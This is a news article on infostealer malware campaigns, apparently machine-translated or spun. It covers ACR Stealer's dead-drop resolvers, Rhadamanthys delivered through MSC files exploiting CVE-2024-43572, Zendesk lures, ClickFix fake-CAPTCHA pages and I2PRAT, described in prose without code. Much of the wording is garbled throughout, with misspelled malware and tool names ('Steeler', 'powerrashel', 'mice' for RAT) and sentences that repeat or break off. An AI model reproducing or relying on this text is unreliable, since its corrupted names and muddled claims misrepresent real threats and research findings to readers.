Cyber security researchers are warning of a new campaign that takes advantage of the broken versions of the software, which is a greed for distributing information theft such as Lumma and ACR Steeler.
Ahnlab Safety Intelligence Center (ASEC) stated that it has seen a spike in the distribution quantity of ACR Steeler since January 2025.
A remarkable aspect of steeler malware is the use of a technique called dead drop resolver to remove the actual command-and-control (C2) server. This includes relying on legitimate services such as Steam, Telegram Telegraph, Google Form and Google Slide.
“Danger actors enter the actual C2 domain in base 64 encoding on a specific page,” ASEC said. “Malware reaches this page, parses string, and receives real C2 domain address to behave malicious.”
The ACR Stealer, which was previously distributed via Hijack Loader Malware, is capable of harvesting a wide range of information from the system, including files, web browser data and the compromised system, including the cryptocurrency wallet extension.
As the development, ASEC reveals another campaign, which uses files with the extension “MSC”, which can be executed by the Microsoft Management Console (MMC), so that RHADAMANTHYS can be distributed to Steler Malware.
“There are two types of MSC malware: one exploits the vulnerability of Apds.DLL (CVE-2024-43572), and the other executes the ‘command’ command using the console taskpad,” said the South Korean company.
“MSc file is disguised as MS Word Document.” When clicked on the ‘Open’ button, it downloads and executes a powercel script from an external source. Downloaded Powershell script contains an exe file (RHADAMANTHYS). ,
CVE-2024-43572, also called Grimresource, was first documented by elastic security laboratories in June 2024, as exploited as zero-day by malicious actors. It was patched by Microsoft in October 2024.
Malware campaigns have also been seen exploiting chat support platforms like Zendesk, as customers as customers to download a stolen named Steeler as customers to trick the support agents.
According to a recent report published by Hudson Rock, more than 30,000,000 computers have been infected by “information stolen in the last few years, causing corporate credentials and sessions cookies, which was then by Cyber Criminal on underground forums Other actors could be sold. For profit.
Buyers can weap the access to these credentials, which can lead their own post exploitation tasks to the stage, which can lead to serious risk. These development works to highlight the role played by Steler Malware as an early access vector that provides a leg to a sensitive corporate environment.
Hudson Rock said, “For $ 10 per log (computer), cyber criminal -classified defense and can buy stolen data from employees working in military areas.” “Infostealer Intellure is not just about finding out who is infected-it is about understanding the full network of compromised credentials and third party risks.”
In the last one year, the danger actors have also been increasing efforts to spread various types of malware families, including a technique called Clickfix, including steeler and remote access trojan (mice), which often users to users fake captcha verification pages Rejuvenates for which instructs them to copy. And execute the nefarious powerrashel command.
One such payload has been dropped, which is I2PRAT, which appoints the I2P anonymous network to anonymity to its final C2 server.
“Malware is an advanced threat that is made of multiple layers, each contains refined mechanisms,” Sekoya said. “The use of an anonym network complicates tracking and obstructs the identification of the magnitude of danger and spreads to the wild.”
